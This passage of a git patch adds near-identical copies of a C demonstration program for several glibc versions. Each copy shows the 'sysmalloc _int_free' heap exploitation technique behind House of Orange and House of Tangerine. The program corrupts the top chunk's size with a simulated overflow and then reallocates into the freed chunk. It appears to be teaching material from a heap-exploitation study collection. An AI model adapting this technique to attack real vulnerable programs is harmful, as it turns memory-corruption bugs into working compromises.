to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. 
create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.34/sysmalloc_int_free.c b/glibc_2.34/sysmalloc_int_free.c index f6810f7..b1974a2 100644 --- a/glibc_2.34/sysmalloc_int_free.c +++ b/glibc_2.34/sysmalloc_int_free.c @@ -10,7 +10,7 @@ #define CHUNK_HDR_SZ (SIZE_SZ*2) // same for x86_64 and x86 -#define MALLOC_ALIGN 0x10L +#define MALLOC_ALIGN (SIZE_SZ*2) #define MALLOC_MASK (-MALLOC_ALIGN) #define PAGESIZE sysconf(_SC_PAGESIZE) @@ -27,6 +27,7 @@ /** * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) * + GLIBC 2.39 (x86_64, x86 & aarch64) * + GLIBC 2.34 (x86_64, x86 & aarch64) * + GLIBC 2.31 (x86_64, x86 & aarch64) diff --git a/glibc_2.35/sysmalloc_int_free.c b/glibc_2.35/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.35/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used 
to corrupt heap without needing to call free() directly. + * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. 
create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.36/sysmalloc_int_free.c b/glibc_2.36/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.36/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. 
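+ *
+ * [Editor's note, not part of the upstream patch] Which bin the released top chunk
+ * lands in depends on the glibc version: with CHUNK_FREED_SIZE = 0x150 it is small
+ * enough for the tcache under default tunables on glibc >= 2.26, so the final
+ * malloc(FREED_SIZE) in this demo takes it back out of the matching tcache bin,
+ * while on 2.23/2.24 (no tcache) it is placed in the unsorted bin instead, as in
+ * the classic House of Orange.
+ *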
+ * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. 
create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.37/sysmalloc_int_free.c b/glibc_2.37/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.37/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. 
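+ *
+ * [Editor's note, not part of the upstream patch] The PROBE allocation further down is
+ * only there to leak the current top chunk size: the probe chunk is sized so that
+ * new[(PROBE / SIZE_SZ) + 1] indexes exactly the size field of the top chunk that
+ * follows it. As the demo's own comment says, this step can be skipped when the size
+ * is already known or predictable.
+ *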
+ * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. 
create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} diff --git a/glibc_2.38/sysmalloc_int_free.c b/glibc_2.38/sysmalloc_int_free.c new file mode 100644 index 0000000..b1974a2 --- /dev/null +++ b/glibc_2.38/sysmalloc_int_free.c @@ -0,0 +1,180 @@ +#define _GNU_SOURCE + +#include +#include +#include +#include +#include + +#define SIZE_SZ sizeof(size_t) + +#define CHUNK_HDR_SZ (SIZE_SZ*2) +// same for x86_64 and x86 +#define MALLOC_ALIGN (SIZE_SZ*2) +#define MALLOC_MASK (-MALLOC_ALIGN) + +#define PAGESIZE sysconf(_SC_PAGESIZE) +#define PAGE_MASK (PAGESIZE-1) + +// fencepost are offsets removed from the top before freeing +#define FENCEPOST (2*CHUNK_HDR_SZ) + +#define PROBE (0x20-CHUNK_HDR_SZ) + +// target top chunk size that should be freed +#define CHUNK_FREED_SIZE 0x150 +#define FREED_SIZE (CHUNK_FREED_SIZE-CHUNK_HDR_SZ) + +/** + * Tested on: + * + GLIBC 2.23 (x86_64, x86 & aarch64) + * + GLIBC 2.39 (x86_64, x86 & aarch64) + * + GLIBC 2.34 (x86_64, x86 & aarch64) + * + GLIBC 2.31 (x86_64, x86 & aarch64) + * + GLIBC 2.27 (x86_64, x86 & aarch64) + * + * sysmalloc allows us to free() the top chunk of heap to create nearly arbitrary bins, + * which can be used to corrupt heap without needing to call free() directly. 
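+ *
+ * [Editor's note, not part of the upstream patch] In step 1 below, top_size_ptr is
+ * computed as &new[(allocated_size / SIZE_SZ) - 1 + (MALLOC_ALIGN / SIZE_SZ)], i.e.
+ * new + allocated_size + SIZE_SZ, which is the size field of the adjacent top chunk;
+ * this is the word a linear heap overflow (BOF/OOB) would have to reach on a real
+ * target.
+ *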
+ * This is achieved through sysmalloc calling _int_free to the top_chunk (wilderness), + * if the top_chunk can't be merged during heap growth + * https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2913 + * + * This technique is used in House of Orange & Tangerine + */ +int main() { + size_t allocated_size, *top_size_ptr, top_size, new_top_size, freed_top_size, *new, *old; + // disable buffering + setvbuf(stdout, NULL, _IONBF, 0); + setvbuf(stdin, NULL, _IONBF, 0); + setvbuf(stderr, NULL, _IONBF, 0); + + // check if all chunks sizes are aligned + assert((CHUNK_FREED_SIZE & MALLOC_MASK) == CHUNK_FREED_SIZE); + + puts("Constants:"); + printf("chunk header \t\t= 0x%lx\n", CHUNK_HDR_SZ); + printf("malloc align \t\t= 0x%lx\n", MALLOC_ALIGN); + printf("page align \t\t= 0x%lx\n", PAGESIZE); + printf("fencepost size \t\t= 0x%lx\n", FENCEPOST); + printf("freed size \t\t= 0x%lx\n", FREED_SIZE); + + printf("target top chunk size \t= 0x%lx\n", CHUNK_HDR_SZ + MALLOC_ALIGN + CHUNK_FREED_SIZE); + + // probe the current size of the top_chunk, + // can be skipped if it is already known or predictable + new = malloc(PROBE); + top_size = new[(PROBE / SIZE_SZ) + 1]; + printf("first top size \t\t= 0x%lx\n", top_size); + + // calculate allocated_size + allocated_size = top_size - CHUNK_HDR_SZ - (2 * MALLOC_ALIGN) - CHUNK_FREED_SIZE; + allocated_size &= PAGE_MASK; + allocated_size &= MALLOC_MASK; + + printf("allocated size \t\t= 0x%lx\n\n", allocated_size); + + puts("1. create initial malloc that will be used to corrupt the top_chunk (wilderness)"); + new = malloc(allocated_size); + + // use BOF or OOB to corrupt the top_chunk + top_size_ptr = &new[(allocated_size / SIZE_SZ)-1 + (MALLOC_ALIGN / SIZE_SZ)]; + + top_size = *top_size_ptr; + + printf("" + "----- %-14p ----\n" + "| NEW | <- initial malloc\n" + "| |\n" + "----- %-14p ----\n" + "| TOP | <- top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + top_size - 1, + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + puts("2. corrupt the size of top chunk to be less, but still page aligned"); + + // make sure corrupt top size is page aligned, generally 0x1000 + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2599 + new_top_size = top_size & PAGE_MASK; + *top_size_ptr = new_top_size; + printf("" + "----- %-14p ----\n" + "| NEW |\n" + "| AAAAAAAAAAAAAAAAAAAAA | <- positive OOB (i.e. BOF)\n" + "----- %-14p ----\n" + "| TOP | <- corrupt size of top chunk (wilderness)\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of current heap page\n\n", + new - 2, + top_size_ptr - 1, + new_top_size - 1, + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + top_size_ptr - 1 + (top_size / SIZE_SZ)); + + + puts("3. 
create an allocation larger than the remaining top chunk, to trigger heap growth"); + puts("The now corrupt top_chunk triggers sysmalloc to call _init_free on it"); + + // remove fencepost from top_chunk, to get size that will be freed + // https://elixir.bootlin.com/glibc/glibc-2.39/source/malloc/malloc.c#L2895 + freed_top_size = (new_top_size - FENCEPOST) & MALLOC_MASK; + assert(freed_top_size == CHUNK_FREED_SIZE); + + old = new; + new = malloc(CHUNK_FREED_SIZE + 0x10); + + printf("" + "----- %-14p ----\n" + "| OLD |\n" + "| AAAAAAAAAAAAAAAAAAAAA |\n" + "----- %-14p ----\n" + "| FREED | <- old top got freed because it couldn't be merged\n" + "| SIZE (0x%05lx) |\n" + "----- %-14p ----\n" + "| FENCEPOST | <- just some architecture depending padding\n" + "----- %-14p ---- <- still page aligned\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| NEW | <- new malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n\n", + old - 2, + top_size_ptr - 1, + freed_top_size, + top_size_ptr - 1 + (CHUNK_FREED_SIZE/SIZE_SZ), + top_size_ptr - 1 + (new_top_size / SIZE_SZ), + new - (MALLOC_ALIGN / SIZE_SZ)); + + puts("...\n"); + + puts("?. reallocated into the freed chunk"); + + old = new; + new = malloc(FREED_SIZE); + + assert((size_t) old > (size_t) new); + + printf("" + "----- %-14p ----\n" + "| NEW | <- allocated into the freed chunk\n" + "| |\n" + "----- %-14p ----\n" + "| ... |\n" + "----- %-14p ---- <- end of previous heap page\n" + "| OLD | <- old malloc\n" + "-------------------------\n" + "| TOP | <- top chunk (wilderness)\n" + "| ... |\n" + "------------------------- <- end of current heap page\n", + new - 2, + top_size_ptr - 1 + (CHUNK_FREED_SIZE / SIZE_SZ), + old - (MALLOC_ALIGN / SIZE_SZ)); +} From 39ecc170f5e1e2f2df45624636d9f809e5a0bcb4 Mon Sep 17 00:00:00 2001 From: Kyle Zeng Date: Tue, 16 Apr 2024 22:10:36 -0700 Subject: [PATCH 2/3] enable house_of_tangerine --- Makefile | 18 ++-- glibc_2.32/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.33/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.35/house_of_tangerine.c | 161 ++++++++++++++++++++++++++++++++ glibc_2.36/house_of_tangerine.c | 161 